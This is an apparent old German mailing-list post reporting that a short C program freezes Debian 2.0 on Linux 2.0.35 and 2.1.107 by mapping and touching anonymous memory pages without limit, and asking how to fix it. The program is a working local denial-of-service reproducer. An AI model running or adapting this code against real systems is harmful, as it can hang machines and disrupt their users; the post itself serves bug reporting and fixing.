[Debian]: Sicherheitsloch in der Speicherverwaltung ?

Hallo,
ich habe ein kurzes Programm geschrieben, das Debian 2.0 mit Linux
2.0.35 und Linux 2.1.107 einfriert:

#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>

int main(int argc,char ** argv)
{

  unsigned long i=1;
  long *p=NULL;
  size_t page_size=4096;
  unsigned long npages=0;
  if (argc>1) npages=strtoul(argv[1],NULL,10);
  if (npages==0) npages=ULONG_MAX;
  while ((p!=-1)&&(npages>i))
    {

p=mmap(0,page_size,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
      i++;
      if (p!=-1) *p=i;
    }
  pause();
  return 0;
}

Wenn man das Programm ohne Argumente aufruft, geht nach kurzer Zeit
_nichts_ mehr, wenn das Prgramm nicht abgebrochen werden kann. Ich bin
auf diesen Effekt durch einen ähnlichen Bug in UAE 0.8.6 gestoßen. Weiß
irgend jemand, wie dieses Problem zu beheben ist?

mfg
Henning Lorenzen